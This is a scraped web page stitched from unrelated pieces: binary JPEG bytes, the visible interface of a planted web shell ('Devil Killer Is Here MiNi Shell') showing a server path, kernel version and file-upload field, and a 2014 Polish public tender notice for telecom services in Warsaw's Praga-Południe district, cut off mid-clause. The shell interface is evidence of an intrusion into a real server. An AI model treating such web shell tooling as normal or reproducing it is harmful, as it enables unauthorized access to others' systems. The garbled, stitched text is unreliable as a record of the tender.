JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141119/380030-N-2014.html

<p class="kh_header"><b>Warszawa: Świadczenie usług telekomunikacyjnych dla ZGN Praga-Południe w 2015 i 2016 roku.</b><br>
<b>Numer ogłoszenia: 380030 - 2014; data zamieszczenia: 19.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga-Południe m.st. Warszawy , ul. Walewska 4, 04-022 Warszawa, woj. mazowieckie, tel. 22 300 35 27, faks 22 300 35 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zgnpragapld.waw.pl/strona/zamowienia-publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych dla ZGN Praga-Południe w 2015 i 2016 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie następujących usług:
1) usługi dzierżawy włókien światłowodowych jednomodowych we wskazanych w szczegółowym opisie przedmiotu zamówienia relacjach oraz o wymaganych parametrach
2) usługi dzierżawy par miedzianych pod budowę torów cyfrowych
3) usługi dostępu do Internetu o wymaganych parametrach we wskazanej w szczegółowym opisie przedmiotu zamówienia lokalizacji
4) usług telefonicznych w zakresie zdefiniowanym w szczegółowym opisie przedmiotu zamówienia 
2. Szczegółowy opis przedmiotu zamówienia:

A. Dzierżawa siedmiu określonych poniżej relacji światłowodowych o wymaganych parametrach pomiędzy budynkami Zamawiającego przez cały okres umowy. 
Relacje światłowodowe niezbędne są do wykonania przez Zamawiającego połączenia lokalnych sieci LAN oraz transmisji VoIP. Ustanowienia połączeń lokalnych wykonane będą we własnym zakresie przez Zamawiającego.
Relacja I: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Budynek Zakładu Gospodarowania Nieruchomościami ul. Walewska 4 w Warszawie, pomieszczenie teleinformatyczne, parter
Ilość włókien światłowodowych wymaganych w danej relacji to dwanaście (12j)
Relacja II: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 1 ul. Niekłańska 35A w Warszawie, pomieszczenie teleinformatyczne, 1-piętro
Ilość włókien światłowodowych wymaganych w danej relacji to sześć (6j)
Relacja III: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 5 (siedziba 2) ul. Siennicka 44 w Warszawie, pomieszczenie teleinformatyczne, 1-piętro
Ilość włókien światłowodowych wymaganych w danej relacji to sześć (6j)
Relacja IV: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 6 ul. Sulejkowska 45 w Warszawie, pomieszczenie teleinformatyczne, poziom -1
Ilość włókien światłowodowych wymaganych w danej relacji to sześć (6j)
Relacja V: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 7 ul. Hetmańska 25 w Warszawie, pomieszczenie teleinformatyczne, parter
Ilość włókien światłowodowych wymaganych w danej relacji to sześć (6j)
Relacja VI: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Urząd Dzielnicy Praga-Południe m.st Warszawy ul. Grochowska 274 w Warszawie, pomieszczenie teleinformatyczne, poziom -1
Ilość włókien światłowodowych wymaganych w danej relacji to sześć (6j)
Relacja VII: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Urząd Dzielnicy Praga-Południe m.st Warszawy ul. Podskarbińska 6 w Warszawie, pomieszczenie teleinformatyczne, parter
Ilość włókien światłowodowych wymaganych w danej relacji to cztery (4j)
A.1. Parametry dla zdefiniowanych w pkt. A relacji światłowodowych wymagane przez Zamawiającego:
A.1.1. Typ światłowodu: jednomodowy (SMF) zgodny ze standardem ITU-T G652
A.1.2. Typ zakończenia: patchcord zakończony stykiem SC lub E2000
A.1.3. Długość relacji nie przekraczająca 10 km
A.2. Żadna z relacji światłowodowych nie może przechodzić przez urządzenia aktywne
A.3. Parametry techniczne włókien powinny umożliwiać transmisje o szybkości 1 Gbit-s z możliwością wykorzystania transmisji WDM
A.4. Parametry dostępności usługi:
A.4.1. Gwarantowany czas reakcji na zgłoszenie awarii - 1 h
A.4.2. Gwarantowany czas naprawy łącza - 8 h
A.4.3. Uruchomienie usługi - do 01.01.2015 do godz. 8.00

B. Dzierżawa siedmiu określonych poniżej relacji par miedzianych o wymaganych parametrach pomiędzy budynkami Zamawiającego przez cały okres umowy. 
Relacje par miedzianych niezbędne są do wykonania połączeń backupowych i zapewnienia redundancji w przypadku awarii tras podstawowych. Ustanowienia połączeń lokalnych wykonane będą we własnym zakresie przez Zamawiającego.
Relacja I: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Budynek Zakładu Gospodarowania Nieruchomościami ul. Walewska 4 w Warszawie, pomieszczenie teleinformatyczne, parter
Ilość par miedzianych wymaganych w danej relacji to dwa (4 żyły)
Relacja II: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 1 ul. Niekłańska 35A w Warszawie, pomieszczenie teleinformatyczne, 1-piętro
Ilość par miedzianych wymaganych w danej relacji to jeden (2 żyły)
Relacja III: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 5 (siedziba 2) ul. Siennicka 44 w Warszawie, pomieszczenie teleinformatyczne, 1-piętro
Ilość par miedzianych wymaganych w danej relacji to jeden (2 żyły)
Relacja IV: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 6 ul. Sulejkowska 45 w Warszawie, pomieszczenie teleinformatyczne, poziom -1
Ilość par miedzianych wymaganych w danej relacji to jeden (2 żyły)
Relacja V: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Administracja Nieruchomości nr 7 ul. Hetmańska 25 w Warszawie, pomieszczenie teleinformatyczne, parter
Ilość par miedzianych wymaganych w danej relacji to jeden (2 żyły)
Relacja VI: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Urząd Dzielnicy Praga-Południe m.st Warszawy ul. Grochowska 274 w Warszawie, pomieszczenie teleinformatyczne, poziom -1
Ilość par miedzianych wymaganych w danej relacji to dwa (4 żyły)
Relacja VII: 
Budynek Zakładu Gospodarowania Nieruchomościami ul. Wąwolnicka 3 w Warszawie, pomieszczenie teleinformatyczne, parter 
do:
Urząd Dzielnicy Praga-Południe m.st Warszawy ul. Podskarbińska 6 w Warszawie, pomieszczenie teleinformatyczne, parter
Ilość par miedzianych wymaganych w danej relacji to jeden (2 żyły)
B.1. Parametry dla zdefiniowanych w pkt. B relacji par miedzianych wymagane przez Zamawiającego:
B.1.1. Typ zakończenia: gniazdo RJ11
B.1.2.	 Długość relacji nie przekraczająca 10 km
B.2. Żadna z relacji światłowodowych nie może przechodzić przez urządzenia aktywne
B.3. Parametry techniczne włókien powinny umożliwiać transmisje o szybkości minimum 2 Mbit-s w technologii SHDSL
B.4. Parametry dostępności usługi:
B.4.1. Gwarantowany czas reakcji na zgłoszenie awarii - 8 h
B.4.2.	 Gwarantowany czas naprawy łącza - 24 h
B.4.3.	Uruchomienie usługi - do 01.01.2015 do godz. 8.00

C. Świadczenie usługi dostępu do sieci Internet przez czas trwania umowy dla lokalizacji ul. Wąwolnicka 3 w Warszawie, doprowadzenie do pomieszczenia teleinformatycznego na parterze. Zamawiający odbierze usługę na swoim urządzeniu sieciowym.
C.1. Parametry techniczne usługi dostępu do Internetu:
C.1.1. Łącze symetryczne o przepustowości minimalnej 100 Mbit/s z możliwością rozszerzenia do 1 GB/s
C.1.2. Wymagane zakończenie łącza interfejs 1000 Base-T styk RJ-45
C.1.3. Przepustowość łącza mierzona w warstwie fizycznej modelu ISO/OSI
C.2. Wykonawca zapewni Zamawiającemu dostęp do usługi serwera DNS i secondary DNS
C.3. Wykonawca udostępni Zamawiającemu 32 adresy IP z zakresu adresów publicznych Wykonawcy w standardzie IPv4
C.4. Wykonawca musi zapewnić możliwość świadczenia usługi przy wykorzystaniu protokołu eBGP:
C.4.1. Usługa musi być świadczona za pomocą innego kabla światłowodowego niż dzierżawione połączenie światłowodowe opisane jako przedmiot zamówienia w punkcie A
C.5. Parametry dostępności usługi:
C.5.1. Gwarantowany czas reakcji na zgłoszenie awarii - 1 h
C.5.2. Gwarantowany czas naprawy łącza - 8 h
C.5.3. Uruchomienie usługi do 01.01.2015  do godz. 8.00
C.6. Wykonawca zapewni łącze zapasowe o przepustowości minimalnej 16 Mbit-s (download) - 2 Mbit-s (upload). Do łącza zapasowego Wykonawca udostępni co najmniej jeden publiczny stały adres IP. Łącze zapasowe musi być zestawione przy użyciu innego medium transmisyjnego niż łącze podstawowe tj. kabel miedziany lub łącze radiowe w paśmie koncesjonowanym.

D. Świadczenie usługi telefonicznej przez czas trwania umowy dla lokalizacji ul. Wąwolnicka 3 w Warszawie doprowadzonej do pomieszczenia teleinformatycznego na parterze
D.1. Wymagania techniczne usługi telefonicznej:
D.1.1. Podłączenie w oparciu o technologię SIP Trunking od IP PBX Zamawiającego ASTERISK do platformy VoIP Wykonawcy z wykorzystaniem interfejsu Ethernet 10/100Base-TX po stronie IPPBX Zamawiającego.
D.1.2. Udostępnienie minimum 50 jednoczesnych kanałów rozmownych
D.1.3. Przeniesienie na usługę SIP Trunking Wykonawcy numeracji Zamawiającego od obecnego dostawcy, numeracja od 22 300-3500 do 22 300-3799. Numeracja ta musi w systemach Wykonawcy zapewnić realizację połączeń alarmowych z identyfikacją instalacji fizycznej pod adresem Walewska 4
D.2. Minimalna funkcjonalność usługi SIP Trunking:
D.2.1. Wyświetlanie prezentacji dzwoniącego w przypadku połączenia przychodzącego do Zamawiającego
D.2.2. Możliwość blokady prezentacji numeru dla połączenia wychodzącego od Zamawiającego
D.2.3. Obsługa połączeń oczekujących
D.2.4. Transmisja faksowa w oparciu o kodek T.38
D.2.5. Transmisja głosu pomiędzy systemem IPPABX a siecią PSTN w oparciu o kodek G.711 a-u lub G729
D.2.6. Połączenia pomiędzy wszystkimi numerami Zamawiającego wymienionymi w ramach przedmiotu zamówienia pkt. C muszą być bezpłatne
D.2.7. Połączenia do wszystkich sieci komórkowych muszą być rozliczane według jednolitej stawki za minutę połączenia w taryfie sekundowej
D.2.8. Dostęp przez WWW do panelu bilingowego, umożliwiający co najmniej następującą operację:
D.2.8.1. Billing dostępny przez WWW udostępniany z dokładnością do każdego numeru Zamawiającego (tzw. billing perddi)
D.2.8.2. Każdego dnia billing musi zawierać dane co najmniej z dnia poprzedniego
D.2.8.3. Eksport do CSV lub XLS z danymi: data-godzina, numer, wybrany numer, czas trwania, strefa, szczyt, kwota netto (zł)
D.2.8.4. Możliwość odczytu faktury z PDF oraz rachunku szczegółowego
D.2.8.5. Możliwość pozyskania ogólnych statystyk o liczbie połączeń, czasie trwania, kwocie
D.2.8.6. autoryzacja w oparciu o SSL (https)
D.2.9	Połączenia do wszystkich sieci stacjonarnych muszą być rozliczenie według jednolitej stawki za minutę połączenia w taryfie sekundowej
D.3. Usługa SIP Trunking musi być zestawiona w oparciu o dedykowane do tej usługi łącze IP zapewniające routing połączeń pomiędzy systemem IP PBX Zamawiającego a platformą VoIP Wykonawcy o przepustowości zapewniającej poprawną realizację co najmniej 50 jednoczesnych połączeń z wykorzystaniem kodeka G.711
D.3.1. Łącze IP musi być zestawione w warstwie fizycznej dwiema niezależnymi od siebie drogami, w tym jedna z wykorzystaniem systemu radiowego punkt-punkt działającego w paśmie koncesjonowanym
D.3.2. Łącze IP musi zapewniać ciągłość działania usługi SIP Trunking w przypadku awarii jednej z dróg fizycznych
D.4. Parametry dostępności usługi:
D.4.1. Gwarantowany czas reakcji na zgłoszenie awarii - 1 h
D.4.2. Gwarantowany czas naprawy łącza - 8 h
D.4.3. Uruchomienie usługi do 01.01.2015 do godz. 8.00
D.5. Wykonawca przeniesie do własnej sieci linie analogowe oraz łącza BRA i będzie świadczył dla Zamawiającego usługę telefoniczną na numerach.
D.5.1. Numery do przeniesienia:
D.5.1.1. Linie analogowe: 
(22)6986002, (22)8100417, (22)8100667, (22)8100875, (22)8108445
D.5.1.2. Łącza BRA:
(22)5111700, (22)5111720, (22)5157200, (22)5171820, (22)5171900, (22)5171940

Wszystkie wykonywane połączenia będą rozliczane za każdą sekundę połączenia według stawki wskazanej za jedną minutę..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych. Wartość robót uzupełniających nie może przekroczyć 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium na całość zamówienia wynosi 6.800,00 zł. (słownie: sześć tysięcy osiemset złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca wykaże, że po-siada aktualny wpis do rejestru przedsiębiorców telekomunikacyjnych prowadzony przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z ustawą z dnia 16 lipca 2004r Prawo telekomunikacyjne (Dz. U. 2004 nr 171 poz. 1800 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca zobowiązany jest załączyć: Druk oferty, dowód wniesienia wadium, kalkulacje cenową wg wzoru stanowiącego Załącznik nr 1A do SIWZ. Ocena spełnienia warunków udziału w postępowaniu i braku podstaw do wykluczenia będzie dokonywana na podstawie dokumentów i oświadczeń złożonych wraz z ofertą wg zasady: spełnia / nie spełnia. Wykonawca musi potwierdzić spełnienie warunków i brak podstaw do wykluczenia nie później niż na dzień składania ofert.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących w szczególności:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - przepustowość łącza Internet - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień umowy na warunkach określonych w §6, §7 i 11 wzoru umowy tj. w przypadku zaistnienia warunku:
1. zmiany osoby nadzorującej/inspektorów nadzoru oraz osoby nadzorującej prace ze strony Wykonawcy. W przypadku zmiany osoby nadzorującej prace ze strony Wykonawcy, Wykonawca zobowiązany mniejszych niż te które były wymagane w postępowaniu o udzielenie zamówienia publicznego. Brak wymaganych uprawnień przy powiadomieniu powoduje, że zmiana jest nieskuteczna.
2. Zamawiający zastrzega sobie prawo do zmiany sposobu wykonania przedmiotu umowy, wycofania zlecenia albo wydłużenia terminu jego realizacji w przypadku:
1)reorganizacji ZGN, 
